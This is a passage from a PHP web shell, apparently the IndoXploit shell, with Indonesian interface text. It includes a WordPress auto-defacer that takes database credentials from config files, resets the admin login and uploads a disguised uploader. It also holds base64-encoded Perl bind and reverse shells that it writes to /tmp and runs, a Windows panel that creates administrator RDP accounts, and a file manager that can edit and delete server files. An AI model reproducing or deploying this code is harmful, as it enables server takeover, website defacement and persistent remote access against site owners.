1496. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1497. curl_setopt($ch, CURLOPT_POST, 1);
1498. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1499. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1500. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1501. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1502. $data3 = curl_exec($ch);
1503. curl_close($ch);
1504. $y = date("Y");
1505. $m = date("m");
1506. $namafile = "id.php";
1507. $fpi = fopen($namafile,"w");
1508. fputs($fpi,$script);
1509. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1510. curl_setopt($ch6, CURLOPT_POST, true);
1511. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1512. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1513. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1514. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1515. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1516. $postResult = curl_exec($ch6);
1517. curl_close($ch6);
1518. $as = "$target/k.php";
1519. $bs = anucurl($as);
1520. if(preg_match("#$script#is", $bs)) {
1521. echo "[+] <font color='red'>berhasil</font><br>";
1522. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1523. } else {
1524. echo "[-] <font color='red'>gagal</font><br>";
1525. echo "[!!] Silahkan coba dengan cara manual: <br>";
1526. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1527. echo "[+] username: <font color=red>$user</font><br>";
1528. echo "[+] password: <font color=red>$pass</font><br><br>";
1529. }
1530. mysql_close($conn);
1531. }
1532. }
1533. }
1534. } else {
1535. echo "<center><h1>WordPress Auto Deface</h1>
1536. <form method='post'>
1537. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1538. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
1539. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1540. </form>
1541. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
1542. </center>";
1543. }
1544. } elseif($_GET['do'] == 'auto_dwp2') {
1545. if($_POST['auto_deface_wp']) {
1546. function anucurl($sites) {
1547. $ch = curl_init($sites);
1548. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1549. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1550. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1551. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1552. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1553. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1554. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1555. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1556. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1557. $data = curl_exec($ch);
1558. curl_close($ch);
1559. return $data;
1560. }
1561. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1562. $post = array(
1563. "log" => "$userr",
1564. "pwd" => "$pass",
1565. "rememberme" => "forever",
1566. "wp-submit" => "$wp_submit",
1567. "redirect_to" => "$web",
1568. "testcookie" => "1",
1569. );
1570. $ch = curl_init($cek);
1571. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1572. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1573. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1574. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1575. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1576. curl_setopt($ch, CURLOPT_POST, 1);
1577. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1578. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1579. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1580. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1581. $data = curl_exec($ch);
1582. curl_close($ch);
1583. return $data;
1584. }
1585. $link = explode("\r\n", $_POST['link']);
1586. $script = htmlspecialchars($_POST['script']);
1587. $user = "indoxploit";
1588. $pass = "indoxploit";
1589. $passx = md5($pass);
1590. foreach($link as $dir_config) {
1591. $config = anucurl($dir_config);
1592. $dbhost = ambilkata($config,"DB_HOST', '","'");
1593. $dbuser = ambilkata($config,"DB_USER', '","'");
1594. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1595. $dbname = ambilkata($config,"DB_NAME', '","'");
1596. $dbprefix = ambilkata($config,"table_prefix = '","'");
1597. $prefix = $dbprefix."users";
1598. $option = $dbprefix."options";
1599. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1600. $db = mysql_select_db($dbname);
1601. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1602. $result = mysql_fetch_array($q);
1603. $id = $result[ID];
1604. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1605. $result2 = mysql_fetch_array($q2);
1606. $target = $result2[option_value];
1607. if($target == '') {
1608. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1609. } else {
1610. echo "[+] $target <br>";
1611. }
1612. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1613. if(!$conn OR !$db OR !$update) {
1614. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1615. mysql_close($conn);
1616. } else {
1617. $site = "$target/wp-login.php";
1618. $site2 = "$target/wp-admin/theme-install.php?upload";
1619. $b1 = anucurl($site2);
1620. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1621. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1622. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1623. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1624. $www = "m.php";
1625. $fp5 = fopen($www,"w");
1626. fputs($fp5,$upload3);
1627. $post2 = array(
1628. "_wpnonce" => "$anu2",
1629.  
1630. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1631. "themezip" => "@$www",
1632. "install-theme-submit" => "Install Now",
1633. );
1634. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1635. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1636. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1637. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1638. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1639. curl_setopt($ch, CURLOPT_POST, 1);
1640. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1641. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1642. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1643. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1644. $data3 = curl_exec($ch);
1645. curl_close($ch);
1646. $y = date("Y");
1647. $m = date("m");
1648. $namafile = "id.php";
1649. $fpi = fopen($namafile,"w");
1650. fputs($fpi,$script);
1651. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1652. curl_setopt($ch6, CURLOPT_POST, true);
1653. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1654. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1655. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1656. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1657. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1658. $postResult = curl_exec($ch6);
1659. curl_close($ch6);
1660. $as = "$target/k.php";
1661. $bs = anucurl($as);
1662. if(preg_match("#$script#is", $bs)) {
1663. echo "[+] <font color='red'>berhasil mepes...</font><br>";
1664. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1665. } else {
1666. echo "[-] <font color='red'>gagal mepes...</font><br>";
1667. echo "[!!] coba aja manual: <br>";
1668. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1669. echo "[+] username: <font color=red>$user</font><br>";
1670. echo "[+] password: <font color=red>$pass</font><br><br>";
1671. }
1672. mysql_close($conn);
1673. }
1674. }
1675. } else {
1676. echo "<center><h1>WordPress Auto Deface V.2</h1>
1677. <form method='post'>
1678. Link Config: <br>
1679. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1680. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
1681. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1682. </form></center>";
1683. }
1684. } elseif($_GET['do'] == 'network') {
1685. echo "<form method='post'>
1686. <u>Bind Port:</u> <br>
1687. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1688. <input type='submit' name='sub_bp' value='>>'>
1689. </form>
1690. <form method='post'>
1691. <u>Back Connect:</u> <br>
1692. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
1693. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1694. <input type='submit' name='sub_bc' value='>>'>
1695. </form>";
1696. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1697. if(isset($_POST['sub_bp'])) {
1698. $f_bp = fopen("/tmp/bp.pl", "w");
1699. fwrite($f_bp, base64_decode($bind_port_p));
1700. fclose($f_bp);
1701.  
1702. $port = $_POST['port_bind'];
1703.  
1704. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1705. sleep(1);
1706. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1707. unlink("/tmp/bp.pl");
1708. }
1709. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1710. if(isset($_POST['sub_bc'])) {
1711. $f_bc = fopen("/tmp/bc.pl", "w");
1712. fwrite($f_bc, base64_decode($bind_connect_p));
1713. fclose($f_bc);
1714.  
1715. $ipbc = $_POST['ip_bc'];
1716. $port = $_POST['port_bc'];
1717. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1718. sleep(1);
1719. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1720. unlink("/tmp/bc.pl");
1721. }
1722. } elseif($_GET['do'] == 'krdp_shell') {
1723. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1724. if($_POST['create']) {
1725. $user = htmlspecialchars($_POST['user']);
1726. $pass = htmlspecialchars($_POST['pass']);
1727. if(preg_match("/$user/", exe("net user"))) {
1728. echo "[INFO] -> <font color=red>user <font color=red>$user</font> sudah ada</font>";
1729. } else {
1730. $add_user = exe("net user $user $pass /add");
1731. $add_groups1 = exe("net localgroup Administrators $user /add");
1732. $add_groups2 = exe("net localgroup Administrator $user /add");
1733. $add_groups3 = exe("net localgroup Administrateur $user /add");
1734. echo "[ RDP ACCOUNT INFO ]<br>
1735. ------------------------------<br>
1736. IP: <font color=red>".$ip."</font><br>
1737. Username: <font color=red>$user</font><br>
1738. Password: <font color=red>$pass</font><br>
1739. ------------------------------<br><br>
1740. [ STATUS ]<br>
1741. ------------------------------<br>
1742. ";
1743. if($add_user) {
1744. echo "[add user] -> <font color='red'>Berhasil</font><br>";
1745. } else {
1746. echo "[add user] -> <font color='red'>Gagal</font><br>";
1747. }
1748. if($add_groups1) {
1749. echo "[add localgroup Administrators] -> <font color='red'>Berhasil</font><br>";
1750. } elseif($add_groups2) {
1751. echo "[add localgroup Administrator] -> <font color='red'>Berhasil</font><br>";
1752. } elseif($add_groups3) {
1753. echo "[add localgroup Administrateur] -> <font color='red'>Berhasil</font><br>";
1754. } else {
1755. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
1756. }
1757. echo "------------------------------<br>";
1758. }
1759. } elseif($_POST['s_opsi']) {
1760. $user = htmlspecialchars($_POST['r_user']);
1761. if($_POST['opsi'] == '1') {
1762. $cek = exe("net user $user");
1763. echo "Checking username <font color=red>$user</font> ....... ";
1764. if(preg_match("/$user/", $cek)) {
1765. echo "[ <font color=red>Sudah ada</font> ]<br>
1766. ------------------------------<br><br>
1767. <pre>$cek</pre>";
1768. } else {
1769. echo "[ <font color=red>belum ada</font> ]";
1770. }
1771. } elseif($_POST['opsi'] == '2') {
1772. $cek = exe("net user $user indoxploit");
1773. if(preg_match("/$user/", exe("net user"))) {
1774. echo "[change password: <font color=red>indoxploit</font>] -> ";
1775. if($cek) {
1776. echo "<font color=red>Berhasil</font>";
1777. } else {
1778. echo "<font color=red>Gagal</font>";
1779. }
1780. } else {
1781. echo "[INFO] -> <font color=red>user <font color=red>$user</font> belum ada</font>";
1782. }
1783. } elseif($_POST['opsi'] == '3') {
1784. $cek = exe("net user $user /DELETE");
1785. if(preg_match("/$user/", exe("net user"))) {
1786. echo "[remove user: <font color=red>$user</font>] -> ";
1787. if($cek) {
1788. echo "<font color=red>Berhasil</font>";
1789. } else {
1790. echo "<font color=red>Gagal</font>";
1791. }
1792. } else {
1793. echo "[INFO] -> <font color=red>user <font color=red>$user</font> belum ada</font>";
1794. }
1795. } else {
1796. //
1797. }
1798. } else {
1799. echo "-- Create RDP --<br>
1800. <form method='post'>
1801. <input type='text' name='user' placeholder='username' value='indoxploit' required>
1802. <input type='text' name='pass' placeholder='password' value='indoxploit' required>
1803. <input type='submit' name='create' value='>>'>
1804. </form>
1805. -- Option --<br>
1806. <form method='post'>
1807. <input type='text' name='r_user' placeholder='username' required>
1808. <select name='opsi'>
1809. <option value='1'>Cek Username</option>
1810. <option value='2'>Ubah Password</option>
1811. <option value='3'>Hapus Username</option>
1812. </select>
1813. <input type='submit' name='s_opsi' value='>>'>
1814. </form>
1815. ";
1816. }
1817. } else {
1818. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
1819. }
1820. } elseif($_GET['act'] == 'newfile') {
1821. if($_POST['new_save_file']) {
1822. $newfile = htmlspecialchars($_POST['newfile']);
1823. $fopen = fopen($newfile, "a+");
1824. if($fopen) {
1825. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
1826. } else {
1827. $act = "<font color=red>permission denied</font>";
1828. }
1829. }
1830. echo $act;
1831. echo "<form method='post'>
1832. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
1833. <input type='submit' name='new_save_file' value='Ganti'>
1834. </form>";
1835. } elseif($_GET['act'] == 'newfolder') {
1836. if($_POST['new_save_folder']) {
1837. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
1838. if(!mkdir($new_folder)) {
1839. $act = "<font color=red>permission denied</font>";
1840. } else {
1841. $act = "<script>window.location='?dir=".$dir."';</script>";
1842. }
1843. }
1844. echo $act;
1845. echo "<form method='post'>
1846. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
1847. <input type='submit' name='new_save_folder' value='Submit'>
1848. </form>";
1849. } elseif($_GET['act'] == 'rename_dir') {
1850. if($_POST['dir_rename']) {
1851. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
1852. if($dir_rename) {
1853. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1854. } else {
1855. $act = "<font color=red>permission denied</font>";
1856. }
1857. echo "".$act."<br>";
1858. }
1859. echo "<form method='post'>
1860. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
1861. <input type='submit' name='dir_rename' value='ganti nama'>
1862. </form>";
1863. } elseif($_GET['act'] == 'delete_dir') {
1864. if(is_dir($dir)) {
1865. if(is_writable($dir)) {
1866. @rmdir($dir);
1867. @exe("rm -rf $dir");
1868. @exe("rmdir /s /q $dir");
1869. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1870. } else {
1871. $act = "<font color=red>could not remove ".basename($dir)."</font>";
1872. }
1873. }
1874. echo $act;
1875. } elseif($_GET['act'] == 'view') {
1876. echo "File: <font color=red>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>lihat</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>ganti nama</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>hapus</a> ]<br>";
1877. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
1878. } elseif($_GET['act'] == 'edit') {
1879. if($_POST['save']) {
1880. $save = file_put_contents($_GET['file'], $_POST['src']);
1881. if($save) {
1882. $act = "<font color=red>Telah di simpan!</font>";
1883. } else {
1884. $act = "<font color=red>permission denied</font>";
1885. }
1886. echo "".$act."<br>";
1887. }
1888. echo "File: <font color=red>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>lihat</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>ganti nama</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>hapus</a> ]<br>";
1889. echo "<form method='post'>
1890. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
1891. <input type='submit' value='SIMPAN' name='save' style='width: auto;'>
1892. </form>";
1893. } elseif($_GET['act'] == 'rename') {
1894. if($_POST['do_rename']) {
1895. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
1896. if($rename) {
1897. $act = "<script>window.location='?dir=".$dir."';</script>";
1898. } else {
1899. $act = "<font color=red>permission denied</font>";
1900. }
1901. echo "".$act."<br>";
1902. }
1903. echo "File: <font color=red>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>lihat</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>ganti nama</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>hapus</a> ]<br>";
1904. echo "<form method='post'>
1905. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
1906. <input type='submit' name='do_rename' value='ganti nama'>
1907. </form>";
1908. } elseif($_GET['act'] == 'delete') {
1909. $delete = unlink($_GET['file']);
1910. if($delete) {
1911. $act = "<script>window.location='?dir=".$dir."';</script>";
1912. } else {
1913. $act = "<font color=red>permission denied</font>";
1914. }
1915. echo $act;
1916. } else {
1917. if(is_dir($dir) === true) {
1918. if(!is_readable($dir)) {
1919. echo "<font color=red>Direktori tidak dapat dibuka</font>";
1920. } else {
1921. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
1922. <tr>
1923. <th class="th_home"><center>Nama file/folder</center></th>
1924. <th class="th_home"><center>Tipe</center></th>
1925. <th class="th_home"><center>Ukuran</center></th>
1926. <th class="th_home"><center>Terakhir di edit</center></th>
1927. <th class="th_home"><center>Permission</center></th>
1928. </tr>'; $scandir = scandir($dir);
1929. foreach($scandir as $dirx) {
1930. $dtype = filetype("$dir/$dirx");
1931. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
1932. if(function_exists('posix_getpwuid')) {
1933. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
1934. $downer = $downer['name'];
1935. } else {
1936. //$downer = $uid;
1937. $downer = fileowner("$dir/$dirx");
1938. }
1939. if(function_exists('posix_getgrgid')) {
1940. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
1941. $dgrp = $dgrp['name'];
1942. } else {
1943. $dgrp = filegroup("$dir/$dirx");
1944. }
1945.  
1946. if(!is_dir("$dir/$dirx")) continue;
1947. if($dirx === '..') {
1948. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
1949. } elseif($dirx === '.') {
1950. $href = "<a href='?dir=$dir'>$dirx</a>";
1951. } else {
1952. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
1953. }
1954. if($dirx === '.' || $dirx === '..') {
1955. $act_dir = "<a href='?act=newfile&dir=$dir'>buat file</a> | <a href='?act=newfolder&dir=$dir'>buat folder</a>";
1956. } else {
1957. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>ganti nama</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>hapus</a>";
1958. }
1959. echo "<tr>";
1960. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
1961. echo "<td class='td_home'><center>$dtype</center></td>";
1962. echo "<td class='td_home'><center>-</center></th></td>";
1963. echo "<td class='td_home'><center>$dtime</center></td>";
1964. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
1965. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
1966. echo "</tr>";
1967. }
1968. }
1969. } else {
1970. echo "<font color=red>can't open directory.</font>";
1971. }
1972. foreach($scandir as $file) {
1973. $ftype = filetype("$dir/$file");
1974. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
1975. $size = filesize("$dir/$file")/1024;
1976. $size = round($size,3);
1977. if(function_exists('posix_getpwuid')) {
1978. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
1979. $fowner = $fowner['name'];
1980. } else {
1981. //$downer = $uid;
1982. $fowner = fileowner("$dir/$file");
1983. }
1984. if(function_exists('posix_getgrgid')) {
1985. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
1986. $fgrp = $fgrp['name'];
1987. } else {
1988. $fgrp = filegroup("$dir/$file");
1989. }
1990. if($size > 1024) {
1991. $size = round($size/1024,2). 'MB';
1992. } else {
1993. $size = $size. 'KB';
1994. }
1995. if(!is_file("$dir/$file")) continue;
1996. echo "<tr>";
1997. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
1998. echo "<td class='td_home'><center>$ftype</center></td>";
1999. echo "<td class='td_home'><center>$size</center></td>";
2000. echo "<td class='td_home'><center>$ftime</center></td>";
2001. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
2002. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>ganti nama</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>hapus</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
2003. echo "</tr>";
2004. }
2005. echo "</table>";
2006. if(!is_readable($dir)) {
2007. //
2008. } else {
2009. echo "";
2010. }
2011. {
2012. echo "<br><br><center>";
2013. echo "========================================================================================================<br>";
2014. echo "Sistem Server: <font color=red>".$kernel."</font><br>";
2015. echo "IP Server: <font color=red>".$ip."</font><br>";
2016. echo "IP Kamu: <font color=red>".$_SERVER['REMOTE_ADDR']."</font><br>";
2017. echo "Harddisk Server: <font color=red>$used</font> dari <font color=red>$total</font> ( Ruang kosong: <font color=red>$freespace</font> )<br>";}
2018. echo "Safe Mode: $sm<br>";
2019. echo "========================================================================================================<br><br><br></center>";
2020. echo "<center>>>> Copyright &copy; 2017 - <a href='' target='_blank'><font color=white>Spider Legion Security <<<</font></a></center>";
2021. }
2022. ?>
2023. </html>